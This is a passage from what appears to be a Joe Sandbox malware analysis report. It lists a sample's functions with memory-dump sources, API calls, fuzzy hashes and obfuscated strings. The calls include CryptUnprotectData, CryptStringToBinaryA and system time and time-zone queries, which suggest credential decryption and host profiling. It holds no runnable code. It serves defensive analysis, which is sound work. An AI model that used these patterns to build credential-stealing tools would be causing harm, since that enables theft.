                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                          • Instruction ID: a411cdbb33008e5cfee63dc8b0b1c76198009216bc8c7b68794b326fd0055efb
                          • Opcode Fuzzy Hash: 9b5b055b83eef97ec5c2c1e82d11444f83e1e28347cb7545af061b22d41260d2
                          • Instruction Fuzzy Hash: 92112A74201208FFEB00DF64EC84FAB37A9AF89301F109948F9198B258DB35EC41DBA0
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                          • LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                          • Instruction ID: 535c3fa4fe0850cc4c1f2e5a69a965aae4bf55ec899c6adbc605576249451ea2
                          • Opcode Fuzzy Hash: a067fb232765fb6f9290ada621344afd2075404e531420f008841e464bcfd0e1
                          • Instruction Fuzzy Hash: 4511A4B4240308AFEB11CF64DC95FAA77B9FB89701F208199F9159B390C775A941CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E00,00000000,?), ref: 009279B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 009279B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00930E00,00000000,?), ref: 009279C4
                          • wsprintfA.USER32 ref: 009279F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                          • Instruction ID: bf62f43a8b33909047004289ecbc0b29d25ce35526e74752f5d2cabb5f2ebb10
                          • Opcode Fuzzy Hash: d7c459220d90010ac58aeee917a9fa2b59dc4382db09291c0e0010fede5038b9
                          • Instruction Fuzzy Hash: 2B112AB2904218ABCB14DFC9DD45BBEB7F8FB4CB12F10425AF605B2280E6395940CBB1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01050080,00000000,?,00930E10,00000000,?,00000000,00000000), ref: 00927A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01050080,00000000,?,00930E10,00000000,?,00000000,00000000,?), ref: 00927A7D
                          • wsprintfA.USER32 ref: 00927AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                          • Instruction ID: e5e9789e9c60891d235cde276638f82a3d24814ee74d464e8623af2d88173c65
                          • Opcode Fuzzy Hash: c0912899a7313860ed7a3651691fea27aa63e73776aec10ebeaa8ddc49710e98
                          • Instruction Fuzzy Hash: 051152B1945228EBDB108B54EC59F69B778F744721F1047D5E516A32C0D7745A40CF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7]b$D9~m$):
                          • API String ID: 0-873614868
                          • Opcode ID: 7a9f0292fa34b84636c3eb34ded0a5d67c679b6b1dd258a15a6fe6e5e593e0d9
                          • Instruction ID: 5fbb004a871251950cdcd98b2e156a75ba15102bbd42089798056815343a6981
                          • Opcode Fuzzy Hash: 7a9f0292fa34b84636c3eb34ded0a5d67c679b6b1dd258a15a6fe6e5e593e0d9
                          • Instruction Fuzzy Hash: 88B24BF3A0C2049FE3046E2DEC8567ABBE9EB94760F16493DEAC4C7744EA3558018797
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6x{w$FpK$IQ$$$JpK
                          • API String ID: 0-2939090419
                          • Opcode ID: 459603bb63ebfbdc6ed7330126edbfea83b75edc728db9b774a491af1a2b881d
                          • Instruction ID: 2e1a8f68603daa188c6019f64c9facd1ffba61a53b9e9fe67eb166f58f046f6b
                          • Opcode Fuzzy Hash: 459603bb63ebfbdc6ed7330126edbfea83b75edc728db9b774a491af1a2b881d
                          • Instruction Fuzzy Hash: 17713CF3A086105FF3489929EC85777BBD5EBD4320F16863EEAC9D3740E9755C048296
                          APIs
                          • CoCreateInstance.COMBASE(0092E118,00000000,00000001,0092E108,00000000), ref: 00923758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 009237B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                          • Instruction ID: d0598a9dbb3e7f1d310abdbb3cee1b6fa1b49463ef78983d0ce42c192c8ceb7a
                          • Opcode Fuzzy Hash: ba5c335ce4d7fa73ae2c12c92c256d6696e3a7bc86d8a6f4c168c7a70385fd15
                          • Instruction Fuzzy Hash: 8D410971A00A289FDB24DF58DC94B9BB7B4BB48702F4081D8E608EB2D0E7716E85CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                          • LocalFree.KERNEL32(?), ref: 00919BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 0d5e605b65411885da704e0d51e0229b8e585bdb40dfcc7a03836da678c5fee9
                          • Instruction ID: 0e7f795ddac9a8f5ca202a2273e8c477e0e34903bb0f6f506466ffbffbc4b6d2
                          • Opcode Fuzzy Hash: 0d5e605b65411885da704e0d51e0229b8e585bdb40dfcc7a03836da678c5fee9
                          • Instruction Fuzzy Hash: 9F11C9B8A00209EFDB04DF94D995AAEB7B9FF88301F104598E915A7350D774AE50CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .'^$Akm
                          • API String ID: 0-839304180
                          • Opcode ID: 5449bc2eb6124dcb0f727e47d95586b825364ae3346b8a6751768cd350023aee
                          • Instruction ID: 0ea125c542fd34477d324922759ac6cc57cbcd4a3828f97a37d725f55071cf86
                          • Opcode Fuzzy Hash: 5449bc2eb6124dcb0f727e47d95586b825364ae3346b8a6751768cd350023aee
                          • Instruction Fuzzy Hash: 266168F3A586044BF318693DDC09776BACADBD0320F1A463DDA99C37C4ED7988018286
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: t<>@$t<>@
                          • API String ID: 0-2757028912
                          • Opcode ID: 35ff50c358b79ec7b41083710085b461f30842b3ec5ec2709dfe246a7ee39d89
                          • Instruction ID: 38c2e6b41d6e7049fc2cf4c407380a666f1d3983cb7f08ca4b14b0ae4dbcb1d8
                          • Opcode Fuzzy Hash: 35ff50c358b79ec7b41083710085b461f30842b3ec5ec2709dfe246a7ee39d89
                          • Instruction Fuzzy Hash: DB5127F36282005FF30C5A2DDD957BA77D7DBD4320F2A863DD684C3B84DA3998054656
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1!]
                          • API String ID: 0-2263508704
                          • Opcode ID: d22992bc973bee7bfe52fb5b950899175c0b9b4a7351be90c20f95e52e05033a
                          • Instruction ID: 0a5c860972280ca0ed32d2bd3941a36d2ec790449e2ad0ab1a047512d82396d4
                          • Opcode Fuzzy Hash: d22992bc973bee7bfe52fb5b950899175c0b9b4a7351be90c20f95e52e05033a
                          • Instruction Fuzzy Hash: 3D71D7F3A082009BF714AE2CDC8676AB7E5EF94710F1A853DDBC8C3784E93959158686
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: _}d
                          • API String ID: 0-1223627365
                          • Opcode ID: 06858ca55e2d1e53677e451f361fcb00e151fded85b0a9d90d231c1614fb418b
                          • Instruction ID: 34ba9f36d0864b722c8e1f461fd4ca4fc8b59355d269101b3fc6c169e6f8d916
                          • Opcode Fuzzy Hash: 06858ca55e2d1e53677e451f361fcb00e151fded85b0a9d90d231c1614fb418b
                          • Instruction Fuzzy Hash: 065139B3E081205FE3086A6DDC097BBBBDADBD4660F1B463EDD8593784D8751C0482C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: aS}
                          • API String ID: 0-4015726027
                          • Opcode ID: 00437aaeff16a0cde72ef56a90c29a8a2b9b0733760ae3763bc30d4dc4c5bce9
